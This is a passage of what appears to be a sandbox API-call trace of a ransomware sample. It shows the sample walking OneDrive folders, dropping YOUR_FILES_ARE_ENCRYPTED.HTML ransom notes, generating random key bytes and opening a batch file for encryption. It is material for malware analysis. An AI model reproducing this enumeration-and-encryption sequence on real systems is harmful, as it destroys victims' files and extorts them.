(pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.424] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73c9f0fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c9f0fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.424] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0113.424] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.424] GetProcessHeap () returned 0x600000 [0113.424] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\bs-latn-ba\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.424] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.425] CloseHandle (hObject=0x330) returned 1 [0113.425] GetProcessHeap () returned 0x600000 [0113.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.425] GetProcessHeap () returned 0x600000 [0113.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.425] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7400c6b5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7400c6b5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7400c6b5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ca", cAlternateFileName="")) returned 1 [0113.425] StrStrIW (lpFirst="ca", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.425] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca") returned 78 [0113.425] GetProcessHeap () returned 0x600000 [0113.425] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.425] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca" [0113.425] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca\\*" [0113.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7400c6b5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7400c6b5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7445ea47, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0113.426] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7400c6b5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7400c6b5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7445ea47, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="..", cAlternateFileName="")) returned 1 [0113.426] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7445ea47, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7445ea47, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7470d604, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.426] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.426] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.426] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.426] lstrlenW (lpString=".mui") returned 4 [0113.426] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.426] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7445ea47, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7445ea47, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7470d604, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.426] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0113.426] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.426] GetProcessHeap () returned 0x600000 [0113.426] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ca\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.427] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.428] CloseHandle (hObject=0x330) returned 1 [0113.428] GetProcessHeap () returned 0x600000 [0113.428] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.428] GetProcessHeap () returned 0x600000 [0113.428] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.429] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x747a5fbd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x747a5fbd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x747a5fbd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ca-es-valencia", cAlternateFileName="CA-ES-~1")) returned 1 [0113.429] StrStrIW (lpFirst="ca-es-valencia", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.429] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia") returned 90 [0113.429] GetProcessHeap () returned 0x600000 [0113.429] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.430] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia" [0113.430] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia\\*" [0113.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x747a5fbd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x747a5fbd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x74ac7152, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName=".", cAlternateFileName="")) returned 0x626878 [0113.430] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x747a5fbd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x747a5fbd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x74ac7152, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="..", cAlternateFileName="")) returned 1 [0113.431] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74ac7152, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x74ac7152, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x74d75bd7, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.431] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.431] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui") returned 126 [0113.431] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.431] lstrlenW (lpString=".mui") returned 4 [0113.431] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.431] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74ac7152, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x74ac7152, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x74d75bd7, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.431] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0113.431] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0113.431] GetProcessHeap () returned 0x600000 [0113.431] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ca-es-valencia\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ca-es-valencia\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.432] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.433] CloseHandle (hObject=0x330) returned 1 [0113.433] GetProcessHeap () returned 0x600000 [0113.433] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.433] GetProcessHeap () returned 0x600000 [0113.433] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.433] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40775fc, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd40775fc, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd410ff09, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x16da, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="CollectOneDriveLogs.bat", cAlternateFileName="COLLEC~1.BAT")) returned 1 [0113.433] StrStrIW (lpFirst="CollectOneDriveLogs.bat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.434] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\CollectOneDriveLogs.bat") returned 99 [0113.434] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0113.434] lstrlenW (lpString=".bat") returned 4 [0113.434] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0113.434] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0113.434] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=5850) returned 1 [0113.434] GetProcessHeap () returned 0x600000 [0113.434] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.436] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="39") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="68") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="0E") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="22") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="CD") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="A6") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="71") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="21") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="3C") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="8C") returned 2 [0113.436] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="C5") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="ED") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="0A") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="52") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="1C") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="7A") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="A0") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="36") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="F2") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="35") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="44") returned 2 [0113.437] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="E2") returned 2 [0113.437] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="77") returned 2 [0113.437] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="62") returned 2 [0113.437] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="9B") returned 2 [0113.437] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="3D") returned 2 [0113.437] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="6F") returned 2 [0113.437] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="46") returned 2 [0113.437] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E3") returned 2 [0113.437] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="21") returned 2 [0113.437] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="74") returned 2 [0113.437] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="6E") returned 2 [0113.438] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\CollectOneDriveLogs.bat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\CollectOneDriveLogs.bat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\CollectOneDriveLogs.bat" [0113.438] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.438] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.438] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74e0e5c8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x74e0e5c8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x74e0e5c8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="cs", cAlternateFileName="")) returned 1 [0113.438] StrStrIW (lpFirst="cs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.438] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs") returned 78 [0113.438] GetProcessHeap () returned 0x600000 [0113.438] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.439] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs" [0113.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs\\*" [0113.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74e0e5c8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x74e0e5c8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7512f465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0113.440] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74e0e5c8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x74e0e5c8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7512f465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.440] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7512f465, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7512f465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7568cb81, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.440] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.440] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.440] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.440] lstrlenW (lpString=".mui") returned 4 [0113.440] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.440] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7512f465, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7512f465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7568cb81, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.440] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0113.440] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 